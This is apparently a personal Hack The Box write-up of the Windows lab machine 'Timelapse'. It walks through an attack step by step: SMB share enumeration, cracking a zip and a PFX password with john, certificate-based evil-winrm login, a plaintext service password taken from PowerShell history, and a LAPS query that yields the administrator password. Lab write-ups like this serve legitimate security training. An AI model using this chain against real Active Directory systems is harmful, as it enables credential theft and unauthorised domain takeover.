Timelapse

assessment

Enumeration

nmap

Has to run with -Pn

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52



──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ nmap -Pn 10.10.11.152 -sV -oA initial_nmap --script vuln

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 13:08 EDT

Nmap scan report for 10.10.11.152

Host is up (0.23s latency).

Not shown: 989 filtered tcp ports (no-response)

PORT     STATE SERVICE       VERSION

53/tcp   open  domain        Simple DNS Plus

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-04 01:27:59Z)

135/tcp  open  msrpc         Microsoft Windows RPC

139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn

389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)

445/tcp  open  microsoft-ds?

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0

636/tcp  open  tcpwrapped

|_ssl-ccs-injection: No reply from server (TIMEOUT)

3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)

3269/tcp open  tcpwrapped

|_ssl-ccs-injection: No reply from server (TIMEOUT)

Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

  

Host script results:

|_smb-vuln-ms10-054: false

|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

smb

As this is most likely a windows server, i’m going to try to connect with smbclient and list shares with a blank password

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28



└─$ smbclient -L 10.10.11.152

Enter WORKGROUP\kali's password:

  

    Sharename       Type      Comment

    ---------       ----      -------

    ADMIN$          Disk      Remote Admin

    C$              Disk      Default share

    IPC$            IPC       Remote IPC

    NETLOGON        Disk      Logon server share

    Shares          Disk      

    SYSVOL          Disk      Logon server share

Reconnecting with SMB1 for workgroup listing.

do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Unable to connect with SMB1 -- no workgroup available

Listing the Shares folder reveals a couple of subfolders, with a zip, some documents and a .msi installer. The zip is password protected. The other shares are password protected.

While i do some research i’ll try to crack the zip file. Seems it would be too easy but i’ll try anyway

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26



┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ zip2john winrm_backup.zip > hash

ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ john hash            

Using default input encoding: UTF-8

Loaded 1 password hash (PKZIP [32/64])

Will run 2 OpenMP threads

Proceeding with single, rules:Single

Press 'q' or Ctrl-C to abort, almost any other key for status

Almost done: Processing the remaining buffered candidate passwords, if any.

Proceeding with wordlist:/usr/share/john/password.lst

Proceeding with incremental:ASCII

Zip can ben opened with supremelegacy. Inside there is a .pfx file. I’ll try to open this again with john.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22



└─$ john pfxhash --wordlist=~/Downloads/Wordlists/rockyou.txt

Using default input encoding: UTF-8

Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])

Cost 1 (iteration count) is 2000 for all loaded hashes

Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes

Will run 2 OpenMP threads

Press 'q' or Ctrl-C to abort, almost any other key for status

thuglegacy       (legacyy_dev_auth.pfx)    

1g 0:00:01:50 DONE (2022-04-03 14:01) 0.009077g/s 29332p/s 29332c/s 29332C/s thuglife06..thug211

Use the "--show" option to display all of the cracked passwords reliably

Session completed.

Again, john finds the password. Let’s try to export the content of the PFX file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10



┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes

  

┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out certificate.pem    

We now have a couple of keys that hopefully will allow us access. I also tried to open the PFX file as text and was able to see a possible login legacyy@timelapse.htb. Some more enumeration shows that port 5986 is open which corresponds to winrm with ssl authentication. The hints in the HTB board also show that this might a possible foothold.

I got a little nudge on the HTB discord. Apparently i’m doing this the correct way, and winrm is the way in. There are a bunch of winrm exploiting tools but the most popular seems to be Evil-winrm which i apparently tried with the correct command. The error that is returned points to something wrong with the certificate, so i’ll retry exporting the private and public keys again.

1
2
3
4
5
6
7
8



┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ evil-winrm -i 10.10.11.152 -k p

Error: An error of type OpenSSL::X509::CertificateError happened, message is nested asn1 error

Error: Exiting with code 1

Foothold

I was indeed missing a step in exporting the keys from the .pfx file. The full sequence of commands is the following:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32



┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out timelapse.pem -nodes

Enter Import Password:

  

┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokey -out cert.pem

pkcs12: Unrecognized flag nokey

pkcs12: Use -help for summary.

  

┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out cert.pem

Enter Import Password:

  

┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ openssl rsa -in timelapse.pem -out timelapse.key

writing RSA key

With the generated key files i can run evil-winrm again:

1
2
3
4



┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ evil-winrm -i 10.10.11.152 -k timelapse.key -c cert.pem -S

User flag

After getting in, i can CD to the user Desktop and type the user.txt file to get the flag.

Previlege escalation

The windows equivalent of .bash_history is %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt.

The following commands seem to enable to run the command whoami as the user **svc_deploy **

1
2
3
4
5
6
7
8



$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck

$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force

$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)

invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}

After running a few commands for testing, i’ll try to change svc_deploy to administrator

 1
 2
 3
 4
 5
 6
 7
 8
 9
10



*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}

Connecting to remote server localhost failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic.

  

    + CategoryInfo          : OpenError: (localhost:String) [], PSRemotingTransportException

    + FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

That would be too easy but i had to try. I believe that the SecureString parameter might be present in some other place. Reading through the docs there might be a way to use powershell to reset admin password.

After running winPEAS.bat one of the items checked was a LAPS password. The documents that i got earlier in enumeration pointed to this feature as having a clear text password for the Administrator account.

After a little nudge on the discord it became clear that the way in is with the svc_deploy user account. So, let’s try to get in using evil-winrm again, this time with the credentials exposed in the powershell history.

1
2
3
4
5
6



┌──(kali㉿kali)-[~/Documents/HTB/Timelapse]

└─$ evil-winrm -i 10.10.11.152 -u svc_deploy -S -s ./

Enter Password:

After opening a winrm session i tried looking for folders but with no luck. This account has no previleges to look inside other users folders. But, the username sounds like something that the app that i downloaded would use to access the LAPS subsystem. Let’s see if i can get that password with a few powershell commands.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14



Evil-WinRM* PS C:\Users> $laps = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime -Server DC01 | ? {$_.'ms-Mcs-AdmPwd'} | select Name,ms-Mcs-AdmPwd,@{label="ExpDate";Expression={([datetime]::FromFileTime([convert]::ToInt64($_.'ms-Mcs-AdmPwdExpirationTime')))}}

*Evil-WinRM* PS C:\Users>

*Evil-WinRM* PS C:\Users> $laps

  

Name ms-Mcs-AdmPwd            ExpDate

---- -------------            -------

DC01 <redacted> 4/14/2022 12:51:12 PM

And there is the administrator password. I can now logon as an administrator and check for folders with the root flag. It’s inside another user’s desktop.

Overall an easier box that what i’m used to, made difficult because it was the first windows box that i tried on HTB.